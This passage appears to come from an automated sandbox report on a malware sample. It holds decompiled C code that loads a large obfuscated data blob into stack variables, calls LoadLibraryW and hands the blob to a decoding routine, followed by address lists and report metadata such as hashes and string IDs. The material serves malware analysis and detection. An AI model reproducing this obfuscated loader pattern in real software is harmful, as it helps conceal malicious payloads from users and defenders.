				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				char _v1560;

				_v1560 = 0x4befb69c;
				_v1556 = 0xe2a7d93;
				_v1552 = 0xec58315b;
				_v1548 = 0xf479b9e5;
				_v1544 = 0x3655e0b3;
				_v1540 = 0x1788529f;
				_v1536 = 0xf8a87d29;
				_v1532 = 0x6a1c103e;
				_v1528 = 0xa3a4c637;
				_v1524 = 0xdd4d869a;
				_v1520 = 0xda58f7da;
				_v1516 = 0xa4aa4a18;
				_v1512 = 0xf64937e7;
				_v1508 = 0xa4ae6a93;
				_v1504 = 0x4a93dd70;
				_v1500 = 0x15b491d3;
				_v1496 = 0xb70e4dcf;
				_v1492 = 0xfb7fcaa2;
				_v1488 = 0x5ce8c08f;
				_v1484 = 0x83c7a18c;
				_v1480 = 0x6c649979;
				_v1476 = 0x8a267553;
				_v1472 = 0x14352803;
				_v1468 = 0xf6f6795d;
				_v1464 = 0xcc94b246;
				_v1460 = 0xbe9f1468;
				_v1456 = 0x3ef68f3a;
				_v1452 = 0x8360e0ee;
				_v1448 = 0xdd8b73c8;
				_v1444 = 0xfc9700e;
				_v1440 = 0x718d1c8;
				_v1436 = 0xffb7254;
				_v1432 = 0x286ed90a;
				_v1428 = 0x1b23db2c;
				_v1424 = 0xda2233ed;
				_v1420 = 0xbc53fd27;
				_v1416 = 0xde98ddd2;
				_v1412 = 0xb4314b61;
				_v1408 = 0xea162a4;
				_v1404 = 0xc02a9ba2;
				_v1400 = 0x967ce52;
				_v1396 = 0xabfbe251;
				_v1392 = 0x175cb512;
				_v1388 = 0xf8447fac;
				_v1384 = 0x2eac2eac;
				_v1380 = 0xf4344c6a;
				_v1376 = 0xbbdcaee3;
				_v1372 = 0xe99636da;
				_v1368 = 0x13a7e5e1;
				_v1364 = 0xff3c9bed;
				_v1360 = 0x8dbfbd40;
				_v1356 = 0xb185ff34;
				_v1352 = 0xcace94c2;
				_v1348 = 0xc80d6527;
				_v1344 = 0xa606e2ad;
				_v1340 = 0x6ae37e45;
				_v1336 = 0x282fa05a;
				_v1332 = 0x88a6d551;
				_v1328 = 0x1ff98e41;
				_v1324 = 0x5afaf771;
				_v1320 = 0xebf0ac61;
				_v1316 = 0x51130de3;
				_v1312 = 0xa1336917;
				_v1308 = 0x7a2f88ee;
				_v1304 = 0x718b7c64;
				_v1300 = 0xf2ab104c;
				_v1296 = 0xb1a7a998;
				_v1292 = 0x268c77d7;
				_v1288 = 0x9a6fd234;
				_v1284 = 0x60166448;
				_v1280 = 0xe602cf3d;
				_v1276 = 0x71c5ac19;
				_v1272 = 0xd33a43b2;
				_v1268 = 0x27eb747f;
				_v1264 = 0x1470ea9a;
				_v1260 = 0xa144ffe1;
				_v1256 = 0xd6d9720b;
				_v1252 = 0x9286eb36;
				_v1248 = 0x2aefe3bd;
				_v1244 = 0xed564a2f;
				_v1240 = 0xa9426475;
				_v1236 = 0x2bf8a593;
				_v1232 = 0xd0a447e5;
				_v1228 = 0x48052515;
				_v1224 = 0x3e8ebb64;
				_v1220 = 0xfe618b29;
				_v1216 = 0x751b8d9a;
				_v1212 = 0xd44d92f4;
				_v1208 = 0x5d775a9c;
				_v1204 = 0x62856083;
				_v1200 = 0xf5056c81;
				_v1196 = 0x29043594;
				_v1192 = 0x4ba08155;
				_v1188 = 0x2b9a15db;
				_v1184 = 0x15929201;
				_v1180 = 0x3631bff8;
				_v1176 = 0x959afeae;
				_v1172 = 0x1b996608;
				_v1168 = 0x9f6b0905;
				_v1164 = 0x6541544e;
				_v1160 = 0x3b4276c2;
				_v1156 = 0x449b5732;
				_v1152 = 0xeeda9290;
				_v1148 = 0xdcaa8116;
				_v1144 = 0xa1baec1f;
				_v1140 = 0x1470c0f3;
				_v1136 = 0x3e6a5a1a;
				_v1132 = 0x3833bb5d;
				_v1128 = 0xdb45c3d4;
				_v1124 = 0x27574c46;
				_v1120 = 0xa80b0835;
				_v1116 = 0xfcd6c910;
				_v1112 = 0xe990762e;
				_v1108 = 0xe0d8e335;
				_v1104 = 0x34abe755;
				_v1100 = 0x56597a74;
				_v1096 = 0xb103ce43;
				_v1092 = 0xef319e25;
				_v1088 = 0x22a91b8d;
				_v1084 = 0xf82edbd2;
				_v1080 = 0x3b4b8d37;
				_v1076 = 0x338cfe68;
				_v1072 = 0xf29573ff;
				_v1068 = 0x563e81d6;
				_v1064 = 0x548c86c1;
				_v1060 = 0x4468b232;
				_v1056 = 0xede258c9;
				_v1052 = 0x7c8c7e70;
				_v1048 = 0xd17a549a;
				_v1044 = 0xaf47054c;
				_v1040 = 0x8e7aa5fb;
				_v1036 = 0xda162cad;
				_v1032 = 0x7f4adfe2;
				_v1028 = 0xb42a2fff;
				_v1024 = 0x7179f28c;
				_v1020 = 0xcf51a6c7;
				_v1016 = 0xb6332844;
				_v1012 = 0xfdcdaa4c;
				_v1008 = 0xb14c459d;
				_v1004 = 0x7564d49e;
				_v1000 = 0x8f70fe3c;
				_v996 = 0xdc36cd7d;
				_v992 = 0x63e63e71;
				_v988 = 0x5edb739d;
				_v984 = 0x1cd504ef;
				_v980 = 0x93b57070;
				_v976 = 0x28a54980;
				_v972 = 0x64ef1114;
				_v968 = 0xed02e6be;
				_v964 = 0xabe7464c;
				_v960 = 0xe34a9f4f;
				_v956 = 0x38e0f1e6;
				_v952 = 0xec04582b;
				_v948 = 0x61693d0f;
				_v944 = 0xe21a0b35;
				_v940 = 0xc48c0b6a;
				_v936 = 0xfc0bfcd2;
				_v932 = 0xe781bd04;
				_v928 = 0x148c9f07;
				_v924 = 0x29cccea2;
				_v920 = 0xae046087;
				_v916 = 0x170e2607;
				_v912 = 0xfb9e28d9;
				_v908 = 0xc5f3c745;
				_v904 = 0x2064696d;
				_v900 = 0xfffefc0b;
				_v896 = 0xf75d58e6;
				_v892 = 0xdd0c0350;
				_v888 = 0xee345fd5;
				_v884 = 0x15c0bc71;
				_v880 = 0xfc21594b;
				_v876 = 0xf7d17b82;
				_v872 = 0xc53fb9bc;
				_v868 = 0x3db78dd2;
				_v864 = 0x5aa3eff4;
				_v860 = 0x4ffb8986;
				_v856 = 0x679dc3d7;
				_v852 = 0xf57679b7;
				_v848 = 0xd4a33e35;
				_v844 = 0x17525c45;
				_v840 = 0x2f705952;
				_v836 = 0x4709a022;
				_v832 = 0xe1344555;
				_v828 = 0xd80a835f;
				_v824 = 0x615f5253;
				_v820 = 0x5433de81;
				_v816 = 0x54f130f8;
				_v812 = 0x4823fa93;
				_v808 = 0xb927d63b;
				_v804 = 0xa075442;
				_v800 = 0xf027a5bf;
				_v796 = 0x1ff6d87a;
				_v792 = 0x717d95e8;
				_v788 = 0xc7adf187;
				_v784 = 0x41178485;
				_v780 = 0xd28e7ea8;
				_v776 = 0xd30c5935;
				_v772 = 0x323cce37;
				_v768 = 0x3b66b84b;
				_v764 = 0x93a4a480;
				_v760 = 0xc6f91e4c;
				_v756 = 0x878d3e1c;
				_v752 = 0xacbe73e0;
				_v748 = 0x39411ffd;
				_v744 = 0x51956353;
				_v740 = 0xeae86d79;
				_v736 = 0x74761c39;
				_v732 = 0x61d7b190;
				_v728 = 0xa072a497;
				_v724 = 0x958dee7a;
				_v720 = 0x9e671c60;
				_v716 = 0xd2430678;
				_v712 = 0x94c08196;
				_v708 = 0x965ab2f9;
				_v704 = 0x29b1888a;
				_v700 = 0x32e7db29;
				_v696 = 0xc7764655;
				_v692 = 0x6f1caa55;
				_v688 = 0x9eb0d2f;
				_v684 = 0x880161c9;
				_v680 = 0xa1c00ce3;
				_v676 = 0xc1d28a66;
				_v672 = 0xcc72ca45;
				_v668 = 0x97b55c25;
				_v664 = 0x8558f7e3;
				_v660 = 0x8ac5a732;
				_v656 = 0x6245af98;
				_v652 = 0xabcc6957;
				_v648 = 0x7e544f4d;
				_v644 = 0x43da5efa;
				_v640 = 0x781609ef;
				_v636 = 0x4617ba68;
				_v632 = 0xdfef7616;
				_v628 = 0x999614b7;
				_v624 = 0xb1861e95;
				_v620 = 0xe7f3ecef;
				_v616 = 0x74d5be3b;
				_v612 = 0x3fc5e28;
				_v608 = 0x1dd16ad;
				_v604 = 0x1052e4f9;
				_v600 = 0x65c2038a;
				_v596 = 0xd0c421c0;
				_v592 = 0xbc4682ff;
				_v588 = 0x32e7b9aa;
				_v584 = 0xd10fbd07;
				_v580 = 0xedbcb66b;
				_v576 = 0x2000143;
				_v572 = 0xcb14edfd;
				_v568 = 0xcf05854d;
				_v564 = 0xa88f0fe2;
				_v560 = 0xb803256e;
				_v556 = 0xb644a825;
				_v552 = 0xeeba0c9d;
				_v548 = 0x388db315;
				_v544 = 0x76b2629a;
				_v540 = 0xf626cd97;
				_v536 = 0x5ffbfc65;
				_v532 = 0x63532dab;
				_v528 = 0xc99a8036;
				_v524 = 0x3db019be;
				_v520 = 0xb8a25e3b;
				_v516 = 0x27c55253;
				_v512 = 0x64213913;
				_v508 = 0x1fc02174;
				_v504 = 0x74194bd1;
				_v500 = 0xc2830dba;
				_v496 = 0x59201bb3;
				_v492 = 0xf0a50b26;
				_v488 = 0x30a58ab3;
				_v484 = 0xe5059002;
				_v480 = 0xf326a3d3;
				_v476 = 0x98f99278;
				_v472 = 0xe9d966bc;
				_v468 = 0xab4cde5d;
				_v464 = 0x808fb1a1;
				_v460 = 0xd56d9e3e;
				_v456 = 0x4fc3d42f;
				_v452 = 0xe97c9080;
				_v448 = 0x5fec54a8;
				_v444 = 0x554cc6e2;
				_v440 = 0x7ae3fc51;
				_v436 = 0x3db9e987;
				_v432 = 0x270657d8;
				_v428 = 0x91df6386;
				_v424 = 0xa06420f6;
				_v420 = 0xb645fca2;
				_v416 = 0x9c6867fb;
				_v412 = 0x519fe36b;
				_v408 = 0xb7531c61;
				_v404 = 0xf5fc84f3;
				_v400 = 0x26cd3d1f;
				_v396 = 0x472b53f7;
				_v392 = 0xf96b6641;
				_v388 = 0xabeb68fc;
				_v384 = 0xeff2f92;
				_v380 = 0x12bd2dda;
				_v376 = 0xad0b7b64;
				_v372 = 0x1ba50940;
				_v368 = 0xd9508423;
				_v364 = 0x5b6a112d;
				_v360 = 0x4c072a9e;
				_v356 = 0xcd632d88;
				_v352 = 0x86676816;
				_v348 = 0x11d5ce75;
				_v344 = 0x4d839846;
				_v340 = 0x61a20281;
				_v336 = 0x7d4b08cc;
				_v332 = 0xe75e3c98;
				_v328 = 0xa09673de;
				_v324 = 0x4fcdca3;
				_v320 = 0x87caecd;
				_v316 = 0x8bb0de23;
				_v312 = 0x8bb4e855;
				_v308 = 0xd5e4f17c;
				_v304 = 0x6ce7b55c;
				_v300 = 0x2917ee1f;
				_v296 = 0xb765a1eb;
				_v292 = 0x17313737;
				_v288 = 0x491b73e5;
				_v284 = 0x60893bf9;
				_v280 = 0x8ed66181;
				_v276 = 0xd3c82709;
				_v272 = 0x74742dcc;
				_v268 = 0xb70f62bb;
				_v264 = 0x46e9044d;
				_v260 = 0xddfb36c2;
				_v256 = 0x1c14621e;
				_v252 = 0x3bba477e;
				_v248 = 0x1f5f3936;
				_v244 = 0xb8113197;
				_v240 = 0x1a909f95;
				_v236 = 0x2ff6f937;
				_v232 = 0x906b0598;
				_v228 = 0xeb5ff201;
				_v224 = 0x6f534f00;
				_v220 = 0x396a258d;
				_v216 = 0xdc74f9cd;
				_v212 = 0x9606240;
				_v208 = 0xeece9328;
				_v204 = 0x98343d05;
				_v200 = 0x46089577;
				_v196 = 0x8ca5a500;
				_v192 = 0x5fa8daa2;
				_v188 = 0xfebc41a3;
				_v184 = 0x4f16be69;
				_v180 = 0x5fcd3ff2;
				_v176 = 0x290cab8a;
				_v172 = 0x9084f10f;
				_v168 = 0x21f4372d;
				_v164 = 0xf77c0e4f;
				_v160 = 0xee8b3883;
				_v156 = 0x9d87c954;
				_v152 = 0xb5dc9ad1;
				_v148 = 0x31d7efed;
				_v144 = 0x23271e7d;
				_v140 = 0x2030c0b1;
				_v136 = 0x89cc42fd;
				_v132 = 0x855c1fdb;
				_v128 = 0x4586f4e2;
				_v124 = 0x6c1867c5;
				_v120 = 0x2b50d8a6;
				_v116 = 0xd392eb31;
				_v112 = 0x5adcea22;
				_v108 = 0xb0c01b07;
				_v104 = 0xfc9581f8;
				_v100 = 0x8a3c0db7;
				_v96 = 0xf184c207;
				_v92 = 0xf7612506;
				_v88 = 0xc77cedd3;
				_v84 = 0x456eed47;
				_v80 = 0x4d7c6473;
				_v76 = 0xf66fe5bc;
				_v72 = 0x3b81c48e;
				_v68 = 0x4ca88e47;
				_v64 = 0xf1f7108e;
				_v60 = 0xb6ad32aa;
				_v56 = 0xa746cf25;
				_v52 = 0x76783488;
				_v48 = 0x8a52240d;
				_v44 = 0xf4ff14a7;
				_v40 = 0xf0d384e;
				_v36 = 0x88b9944;
				_v32 = 0x8289fea5;
				_v28 = 0xf70587d8;
				_v24 = 0xecf5125b;
				_v20 = 0x4b2bcabe;
				_v16 = 0x645459e0;
				_v12 = 0x8f09d154;
				_v8 = 0x7a530fa7;
				_t400 = E00401A52(0x412980, 0x72fc3a35);
				 *0x4164f4 = LoadLibraryW(_t391);
				L00401B09(_t400);
				_push(0x414e70);
				_push(0x4fb37d17);
				return E004012FF( *0x4164f4,  &_v1560, 0x185);
			}








































































































































































































































































































































































































                  0x00408cdf
                  0x00408ce9
                  0x00408cf3
                  0x00408cfd
                  0x00408d07
                  0x00408d11
                  0x00408d1b
                  0x00408d25
                  0x00408d2f
                  0x00408d39
                  0x00408d43
                  0x00408d4d
                  0x00408d57
                  0x00408d61
                  0x00408d6b
                  0x00408d75
                  0x00408d7f
                  0x00408d89
                  0x00408d93
                  0x00408d9d
                  0x00408da7
                  0x00408db1
                  0x00408dbb
                  0x00408dc5
                  0x00408dcf
                  0x00408dd9
                  0x00408de3
                  0x00408ded
                  0x00408df7
                  0x00408e01
                  0x00408e0b
                  0x00408e15
                  0x00408e1f
                  0x00408e29
                  0x00408e33
                  0x00408e3d
                  0x00408e47
                  0x00408e51
                  0x00408e5b
                  0x00408e65
                  0x00408e6f
                  0x00408e79
                  0x00408e83
                  0x00408e8d
                  0x00408e97
                  0x00408ea1
                  0x00408eab
                  0x00408eb5
                  0x00408ebf
                  0x00408ec9
                  0x00408ed3
                  0x00408edd
                  0x00408ee7
                  0x00408ef1
                  0x00408efb
                  0x00408f05
                  0x00408f0f
                  0x00408f19
                  0x00408f23
                  0x00408f2d
                  0x00408f37
                  0x00408f41
                  0x00408f4b
                  0x00408f55
                  0x00408f5f
                  0x00408f69
                  0x00408f73
                  0x00408f7d
                  0x00408f87
                  0x00408f91
                  0x00408f9b
                  0x00408fa5
                  0x00408faf
                  0x00408fb9
                  0x00408fc3
                  0x00408fcd
                  0x00408fd7
                  0x00408fe1
                  0x00408feb
                  0x00408ff5
                  0x00408fff
                  0x00409009
                  0x00409013
                  0x0040901d
                  0x00409027
                  0x00409031
                  0x0040903b
                  0x00409045
                  0x0040904f
                  0x00409059
                  0x00409063
                  0x0040906d
                  0x00409077
                  0x00409081
                  0x0040908b
                  0x00409095
                  0x0040909f
                  0x004090a9
                  0x004090b3
                  0x004090bd
                  0x004090c7
                  0x004090d1
                  0x004090db
                  0x004090e5
                  0x004090ef
                  0x004090f9
                  0x00409103
                  0x0040910d
                  0x00409117
                  0x00409121
                  0x0040912b
                  0x00409135
                  0x0040913f
                  0x00409149
                  0x00409153
                  0x0040915d
                  0x00409167
                  0x00409171
                  0x0040917b
                  0x00409185
                  0x0040918f
                  0x00409199
                  0x004091a3
                  0x004091ad
                  0x004091b7
                  0x004091c1
                  0x004091cb
                  0x004091d5
                  0x004091df
                  0x004091e9
                  0x004091f3
                  0x004091fd
                  0x00409207
                  0x00409211
                  0x0040921b
                  0x00409225
                  0x0040922f
                  0x00409239
                  0x00409243
                  0x0040924d
                  0x00409257
                  0x00409261
                  0x0040926b
                  0x00409275
                  0x0040927f
                  0x00409289
                  0x00409293
                  0x0040929d
                  0x004092a7
                  0x004092b1
                  0x004092bb
                  0x004092c5
                  0x004092cf
                  0x004092d9
                  0x004092e3
                  0x004092ed
                  0x004092f7
                  0x00409301
                  0x0040930b
                  0x00409315
                  0x0040931f
                  0x00409329
                  0x00409333
                  0x0040933d
                  0x00409347
                  0x00409351
                  0x0040935b
                  0x00409365
                  0x0040936f
                  0x00409379
                  0x00409383
                  0x0040938d
                  0x00409397
                  0x004093a1
                  0x004093ab
                  0x004093b5
                  0x004093bf
                  0x004093c9
                  0x004093d3
                  0x004093dd
                  0x004093e7
                  0x004093f1
                  0x004093fb
                  0x00409405
                  0x0040940f
                  0x00409419
                  0x00409423
                  0x0040942d
                  0x00409437
                  0x00409441
                  0x0040944b
                  0x00409455
                  0x0040945f
                  0x00409469
                  0x00409473
                  0x0040947d
                  0x00409487
                  0x00409491
                  0x0040949b
                  0x004094a5
                  0x004094af
                  0x004094b9
                  0x004094c3
                  0x004094cd
                  0x004094d7
                  0x004094e1
                  0x004094eb
                  0x004094f5
                  0x004094ff
                  0x00409509
                  0x00409513
                  0x0040951d
                  0x00409527
                  0x00409531
                  0x0040953b
                  0x00409545
                  0x0040954f
                  0x00409559
                  0x00409563
                  0x0040956d
                  0x00409577
                  0x00409581
                  0x0040958b
                  0x00409595
                  0x0040959f
                  0x004095a9
                  0x004095b3
                  0x004095bd
                  0x004095c7
                  0x004095d1
                  0x004095db
                  0x004095e5
                  0x004095ef
                  0x004095f9
                  0x00409603
                  0x0040960d
                  0x00409617
                  0x00409621
                  0x0040962b
                  0x00409635
                  0x0040963f
                  0x00409649
                  0x00409653
                  0x0040965d
                  0x00409667
                  0x00409671
                  0x0040967b
                  0x00409685
                  0x0040968f
                  0x00409699
                  0x004096a3
                  0x004096ad
                  0x004096b7
                  0x004096c1
                  0x004096cb
                  0x004096d5
                  0x004096df
                  0x004096e9
                  0x004096f3
                  0x004096fd
                  0x00409707
                  0x00409711
                  0x0040971b
                  0x00409725
                  0x0040972f
                  0x00409739
                  0x00409743
                  0x0040974d
                  0x00409757
                  0x00409761
                  0x0040976b
                  0x00409775
                  0x0040977f
                  0x00409789
                  0x00409793
                  0x0040979d
                  0x004097a7
                  0x004097b1
                  0x004097bb
                  0x004097c5
                  0x004097cf
                  0x004097d9
                  0x004097e3
                  0x004097ed
                  0x004097f7
                  0x00409801
                  0x0040980b
                  0x00409815
                  0x0040981f
                  0x00409829
                  0x00409833
                  0x0040983d
                  0x00409847
                  0x00409851
                  0x0040985b
                  0x00409865
                  0x0040986f
                  0x00409879
                  0x00409883
                  0x0040988d
                  0x00409897
                  0x004098a1
                  0x004098ab
                  0x004098b5
                  0x004098bf
                  0x004098c9
                  0x004098d3
                  0x004098dd
                  0x004098e7
                  0x004098f1
                  0x004098fb
                  0x00409905
                  0x0040990f
                  0x00409919
                  0x00409923
                  0x0040992d
                  0x00409937
                  0x00409941
                  0x0040994b
                  0x00409955
                  0x0040995f
                  0x00409969
                  0x00409973
                  0x00409982
                  0x00409991
                  0x0040999b
                  0x004099a5
                  0x004099af
                  0x004099b9
                  0x004099c3
                  0x004099cd
                  0x004099d7
                  0x004099e1
                  0x004099eb
                  0x004099f5
                  0x004099ff
                  0x00409a09
                  0x00409a13
                  0x00409a1d
                  0x00409a27
                  0x00409a31
                  0x00409a3b
                  0x00409a45
                  0x00409a4f
                  0x00409a59
                  0x00409a63
                  0x00409a6d
                  0x00409a77
                  0x00409a81
                  0x00409a8b
                  0x00409a95
                  0x00409a9f
                  0x00409aa9
                  0x00409ab3
                  0x00409abd
                  0x00409ac7
                  0x00409ad1
                  0x00409adb
                  0x00409ae2
                  0x00409ae9
                  0x00409af0
                  0x00409af7
                  0x00409afe
                  0x00409b05
                  0x00409b0c
                  0x00409b13
                  0x00409b1a
                  0x00409b21
                  0x00409b28
                  0x00409b2f
                  0x00409b36
                  0x00409b3d
                  0x00409b44
                  0x00409b4b
                  0x00409b52
                  0x00409b59
                  0x00409b60
                  0x00409b67
                  0x00409b6e
                  0x00409b75
                  0x00409b7c
                  0x00409b83
                  0x00409b8a
                  0x00409b91
                  0x00409b98
                  0x00409b9f
                  0x00409ba6
                  0x00409bad
                  0x00409bb4
                  0x00409bc0
                  0x00409bcb
                  0x00409bd0
                  0x00409be1
                  0x00409be6
                  0x00409bfc

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040B6B5, Relevance: 30.1, APIs: 1, Strings: 16, Instructions: 380libraryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
